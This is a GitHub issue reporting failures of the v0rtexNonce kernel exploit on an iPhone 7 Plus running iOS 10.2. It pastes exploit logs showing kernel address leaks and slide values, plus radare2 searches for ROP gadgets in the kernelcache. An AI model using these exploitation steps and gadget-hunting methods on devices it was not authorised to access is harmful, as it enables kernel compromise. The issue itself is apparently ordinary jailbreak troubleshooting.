
ip7+ 10.2 "Failed to leak realport address", "Invalid shift mask" or restart automatically #53

Open · Xiaobin0860 opened this issue Mar 2, 2018 · 1 comment

Xiaobin0860 commented Mar 2, 2018

2018-03-02 09:22:24.677041 v0rtexNonce[246:6322] uid isn't 0
2018-03-02 09:22:27.976314 v0rtexNonce[246:6322] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:22:27.976487 v0rtexNonce[246:6322] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:22:27.976565 v0rtexNonce[246:6322] test offset x0x0x10gadget: b592b8
2018-03-02 09:22:27.976928 v0rtexNonce[246:6322] service: 5d0b
2018-03-02 09:22:27.977261 v0rtexNonce[246:6322] client: 5e0b, (os/kern) successful
2018-03-02 09:22:27.978078 v0rtexNonce[246:6322] newSurface: (os/kern) successful
2018-03-02 09:22:27.978305 v0rtexNonce[246:6322] realport: 5f03, (os/kern) successful
2018-03-02 09:22:28.006642 v0rtexNonce[246:6322] port: 106003
2018-03-02 09:22:28.007610 v0rtexNonce[246:6322] mach_port_insert_right: (os/kern) successful
2018-03-02 09:22:28.008615 v0rtexNonce[246:6322] mach_ports_register: (os/kern) successful
2018-03-02 09:22:28.008776 v0rtexNonce[246:6322] herp derp

2018-03-02 09:22:28.110803 v0rtexNonce[246:6322] mach_ports_register: (os/kern) successful
2018-03-02 09:22:28.448730 v0rtexNonce[246:6322] mach_port_get_context: 0x300000a100000011, (os/kern) successful
2018-03-02 09:22:28.449064 v0rtexNonce[246:6322] reallocate_buf: (os/kern) successful
2018-03-02 09:22:28.449113 v0rtexNonce[246:6322] mach_port_request_notification(realport): 0, (os/kern) successful
2018-03-02 09:22:28.449215 v0rtexNonce[246:6322] getValue(161): 0x1010 bytes, (os/kern) successful
2018-03-02 09:22:28.449232 v0rtexNonce[246:6322] Failed to leak realport address
2018-03-02 09:22:28.456102 v0rtexNonce[246:6322] Failed to get kernel task
2018-03-02 09:22:28.489822 v0rtexNonce[246:6322] Reading var failed
2018-03-02 09:22:28.489888 v0rtexNonce[246:6322] current generator:


2018-03-02 10:16:39.810735 v0rtexNonce[217:4344] uid isn't 0
2018-03-02 10:16:39.813292 v0rtexNonce[217:4344] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 10:16:39.813345 v0rtexNonce[217:4344] loading offsets for iPhone9,2 - 14C92
2018-03-02 10:16:39.813369 v0rtexNonce[217:4344] test offset x0x0x10gadget: b592b8
2018-03-02 10:16:39.813462 v0rtexNonce[217:4344] service: 5d0b
2018-03-02 10:16:39.813581 v0rtexNonce[217:4344] client: 5e0b, (os/kern) successful
2018-03-02 10:16:39.813882 v0rtexNonce[217:4344] newSurface: (os/kern) successful
2018-03-02 10:16:39.813943 v0rtexNonce[217:4344] realport: 5f03, (os/kern) successful
2018-03-02 10:16:39.830728 v0rtexNonce[217:4344] port: 106003
2018-03-02 10:16:39.830891 v0rtexNonce[217:4344] mach_port_insert_right: (os/kern) successful
2018-03-02 10:16:39.830954 v0rtexNonce[217:4344] mach_ports_register: (os/kern) successful
2018-03-02 10:16:39.831011 v0rtexNonce[217:4344] herp derp
2018-03-02 10:16:39.941308 v0rtexNonce[217:4344] mach_ports_register: (os/kern) successful
2018-03-02 10:16:40.453699 v0rtexNonce[217:4344] mach_port_get_context: 0x0000000000000011, (os/kern) successful
2018-03-02 10:16:40.453769 v0rtexNonce[217:4344] Invalid shift mask.
2018-03-02 10:16:40.465956 v0rtexNonce[217:4344] Failed to get kernel task
2018-03-02 10:16:40.512669 v0rtexNonce[217:4344] Reading var failed
2018-03-02 10:16:40.512767 v0rtexNonce[217:4344] current generator:


2018-03-02 09:24:43.394738 v0rtexNonce[236:5176] uid isn't 0
2018-03-02 09:24:43.396583 v0rtexNonce[236:5176] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:24:43.396620 v0rtexNonce[236:5176] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:24:43.396636 v0rtexNonce[236:5176] test offset x0x0x10gadget: b592b8
2018-03-02 09:24:43.396704 v0rtexNonce[236:5176] service: 5d0b
2018-03-02 09:24:43.396786 v0rtexNonce[236:5176] client: 5e0b, (os/kern) successful
2018-03-02 09:24:43.396918 v0rtexNonce[236:5176] newSurface: (os/kern) successful
2018-03-02 09:24:43.396947 v0rtexNonce[236:5176] realport: 5f03, (os/kern) successful
2018-03-02 09:24:43.401767 v0rtexNonce[236:5176] port: 106003
2018-03-02 09:24:43.401816 v0rtexNonce[236:5176] mach_port_insert_right: (os/kern) successful
2018-03-02 09:24:43.401848 v0rtexNonce[236:5176] mach_ports_register: (os/kern) successful
2018-03-02 09:24:43.401876 v0rtexNonce[236:5176] herp derp
2018-03-02 09:24:43.502946 v0rtexNonce[236:5176] mach_ports_register: (os/kern) successful
2018-03-02 09:24:43.731182 v0rtexNonce[236:5176] mach_port_get_context: 0x1000008c00000000, (os/kern) successful
restart ...


2018-03-02 09:29:43.891386 v0rtexNonce[219:3861] uid isn't 0
2018-03-02 09:29:43.896480 v0rtexNonce[219:3861] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:29:43.897003 v0rtexNonce[219:3861] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:29:43.897204 v0rtexNonce[219:3861] test offset x0x0x10gadget: b592b8
2018-03-02 09:29:43.897792 v0rtexNonce[219:3861] service: 5d0b
2018-03-02 09:29:43.898018 v0rtexNonce[219:3861] client: 5e0b, (os/kern) successful
2018-03-02 09:29:43.898263 v0rtexNonce[219:3861] newSurface: (os/kern) successful
2018-03-02 09:29:43.898396 v0rtexNonce[219:3861] realport: 5f03, (os/kern) successful
2018-03-02 09:29:43.920022 v0rtexNonce[219:3861] port: 106003
2018-03-02 09:29:43.920791 v0rtexNonce[219:3861] mach_port_insert_right: (os/kern) successful
2018-03-02 09:29:43.921034 v0rtexNonce[219:3861] mach_ports_register: (os/kern) successful
2018-03-02 09:29:43.921262 v0rtexNonce[219:3861] herp derp
2018-03-02 09:29:44.037376 v0rtexNonce[219:3861] mach_ports_register: (os/kern) successful
2018-03-02 09:29:44.344575 v0rtexNonce[219:3861] mach_port_get_context: 0x200000ac00000000, (os/kern) successful
2018-03-02 09:29:44.354845 v0rtexNonce[219:3861] reallocate_buf: (os/kern) successful
restart ...


2018-03-02 09:55:05.965573 v0rtexNonce[222:3927] uid isn't 0
2018-03-02 09:55:05.967786 v0rtexNonce[222:3927] Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010
2018-03-02 09:55:05.967838 v0rtexNonce[222:3927] loading offsets for iPhone9,2 - 14C92
2018-03-02 09:55:05.967887 v0rtexNonce[222:3927] test offset x0x0x10gadget: b592b8
2018-03-02 09:55:05.967985 v0rtexNonce[222:3927] service: 5d0b
2018-03-02 09:55:05.968106 v0rtexNonce[222:3927] client: 5e0b, (os/kern) successful
2018-03-02 09:55:05.968233 v0rtexNonce[222:3927] newSurface: (os/kern) successful
2018-03-02 09:55:05.968278 v0rtexNonce[222:3927] realport: 5f03, (os/kern) successful
2018-03-02 09:55:05.989664 v0rtexNonce[222:3927] port: 106003
2018-03-02 09:55:05.989742 v0rtexNonce[222:3927] mach_port_insert_right: (os/kern) successful
2018-03-02 09:55:05.989795 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:05.989839 v0rtexNonce[222:3927] herp derp
2018-03-02 09:55:06.100897 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:06.518535 v0rtexNonce[222:3927] mach_port_get_context: 0x300000a300000011, (os/kern) successful
2018-03-02 09:55:06.528810 v0rtexNonce[222:3927] reallocate_buf: (os/kern) successful
2018-03-02 09:55:06.528918 v0rtexNonce[222:3927] mach_port_request_notification(realport): 0, (os/kern) successful
2018-03-02 09:55:06.529059 v0rtexNonce[222:3927] getValue(163): 0x1010 bytes, (os/kern) successful
2018-03-02 09:55:06.529092 v0rtexNonce[222:3927] realport addr: 0xffffffe0041bdae8
2018-03-02 09:55:06.529128 v0rtexNonce[222:3927] mach_port_request_notification(fakeport): 6007, (os/kern) successful
2018-03-02 09:55:06.529252 v0rtexNonce[222:3927] getValue(163): 0x1010 bytes, (os/kern) successful
2018-03-02 09:55:06.529276 v0rtexNonce[222:3927] fakeport addr: 0xffffffe00445e178
2018-03-02 09:55:06.539468 v0rtexNonce[222:3927] reallocate_buf: (os/kern) successful
2018-03-02 09:55:06.539570 v0rtexNonce[222:3927] itk_space: 0xffffffe000545cb0
2018-03-02 09:55:06.539605 v0rtexNonce[222:3927] self_task: 0xffffffe001409540
2018-03-02 09:55:06.539637 v0rtexNonce[222:3927] IOSurfaceRootUserClient port: 0xffffffe0046a9260
2018-03-02 09:55:06.539711 v0rtexNonce[222:3927] IOSurfaceRootUserClient addr: 0xffffffe002606600
2018-03-02 09:55:06.539744 v0rtexNonce[222:3927] IOSurfaceRootUserClient vtab: 0xfffffff01d4521e0
2018-03-02 09:55:06.539762 v0rtexNonce[222:3927] slide: 0x0000000016600000
2018-03-02 09:55:06.539789 v0rtexNonce[222:3927] mach_ports_register: (os/kern) successful
2018-03-02 09:55:06.539824 v0rtexNonce[222:3927] zone_map: 0x0000000014000000
restart ...

Xiaobin0860 (Author) commented

Why are OFFSET_ROP_ADD_X0_X0_0x10 and OFFSET_ROP_LDR_X0_X0_0x10 32 bits?
Should I try another address?

$ r2 -q -e scr.color=true -c '"/a add x0, x0, 0x10; ret"' kernelcache 2> /dev/null
0x00b592b8 hit0_0 00400091c0035fd6
0x00cb4b34 hit0_1 00400091c0035fd6
0x00d3dd78 hit0_2 00400091c0035fd6
0x00d92dd8 hit0_3 00400091c0035fd6
0x00d9969c hit0_4 00400091c0035fd6
0x01162fa8 hit0_5 00400091c0035fd6
0xfffffff0063e529c hit0_6 00400091c0035fd6
0xfffffff006540b18 hit0_7 00400091c0035fd6
0xfffffff0065c9d5c hit0_8 00400091c0035fd6
0xfffffff00661edbc hit0_9 00400091c0035fd6
0xfffffff006625680 hit0_10 00400091c0035fd6
0xfffffff0069eef8c hit0_11 00400091c0035fd6

$ r2 -q -e scr.color=true -c '"/a ldr x0, [x0, 0x10]; ret"' kernelcache 2> /dev/null
0x00261884 hit0_0 000840f9c0035fd6
0x003b32e8 hit0_1 000840f9c0035fd6
0x003e4fa4 hit0_2 000840f9c0035fd6
0x003f1cc0 hit0_3 000840f9c0035fd6
0x00421174 hit0_4 000840f9c0035fd6
0x004730cc hit0_5 000840f9c0035fd6
0x0048a710 hit0_6 000840f9c0035fd6
0x0048cfc8 hit0_7 000840f9c0035fd6
0x0048fdac hit0_8 000840f9c0035fd6
0x004d0828 hit0_9 000840f9c0035fd6
0x004d5a38 hit0_10 000840f9c0035fd6
0x004d7fa8 hit0_11 000840f9c0035fd6
0x004ed038 hit0_12 000840f9c0035fd6
0x00512498 hit0_13 000840f9c0035fd6
0x00aa4ad4 hit0_14 000840f9c0035fd6
0x00ab45a4 hit0_15 000840f9c0035fd6
0x00b770d0 hit0_16 000840f9c0035fd6
0x00c2e620 hit0_17 000840f9c0035fd6
0x00c8bcec hit0_18 000840f9c0035fd6
0x00d0ebc0 hit0_19 000840f9c0035fd6
0x00d3e0d4 hit0_20 000840f9c0035fd6
0x00dd8f98 hit0_21 000840f9c0035fd6
0x00decd38 hit0_22 000840f9c0035fd6
0x010493a0 hit0_23 000840f9c0035fd6
0x01060838 hit0_24 000840f9c0035fd6
0x010685b8 hit0_25 000840f9c0035fd6
0x01076f68 hit0_26 000840f9c0035fd6
0x010e3b54 hit0_27 000840f9c0035fd6
0x011aa300 hit0_28 000840f9c0035fd6
0x012ed2d8 hit0_29 000840f9c0035fd6
0x013a3ef8 hit0_30 000840f9c0035fd6
0x01551600 hit0_31 000840f9c0035fd6
0xfffffff006330ab8 hit0_32 000840f9c0035fd6
0xfffffff006340588 hit0_33 000840f9c0035fd6
0xfffffff0064030b4 hit0_34 000840f9c0035fd6
0xfffffff0064ba604 hit0_35 000840f9c0035fd6
0xfffffff006517cd0 hit0_36 000840f9c0035fd6
0xfffffff00659aba4 hit0_37 000840f9c0035fd6
0xfffffff0065ca0b8 hit0_38 000840f9c0035fd6
0xfffffff006664f7c hit0_39 000840f9c0035fd6
0xfffffff006678d1c hit0_40 000840f9c0035fd6
0xfffffff0068d5384 hit0_41 000840f9c0035fd6
0xfffffff0068ec81c hit0_42 000840f9c0035fd6
0xfffffff0068f459c hit0_43 000840f9c0035fd6
0xfffffff006902f4c hit0_44 000840f9c0035fd6
0xfffffff00696fb38 hit0_45 000840f9c0035fd6
0xfffffff006a362e4 hit0_46 000840f9c0035fd6
0xfffffff006b792bc hit0_47 000840f9c0035fd6
0xfffffff006c2fedc hit0_48 000840f9c0035fd6
0xfffffff006ddd5e4 hit0_49 000840f9c0035fd6
0xfffffff007265868 hit0_50 000840f9c0035fd6
0xfffffff0073b72cc hit0_51 000840f9c0035fd6
0xfffffff0073e8f88 hit0_52 000840f9c0035fd6
0xfffffff0073f5ca4 hit0_53 000840f9c0035fd6
0xfffffff007425158 hit0_54 000840f9c0035fd6
0xfffffff0074770b0 hit0_55 000840f9c0035fd6
0xfffffff00748e6f4 hit0_56 000840f9c0035fd6
0xfffffff007490fac hit0_57 000840f9c0035fd6
0xfffffff007493d90 hit0_58 000840f9c0035fd6
0xfffffff0074d480c hit0_59 000840f9c0035fd6
0xfffffff0074d9a1c hit0_60 000840f9c0035fd6
0xfffffff0074dbf8c hit0_61 000840f9c0035fd6
0xfffffff0074f101c hit0_62 000840f9c0035fd6
0xfffffff00751647c hit0_63 000840f9c0035fd6
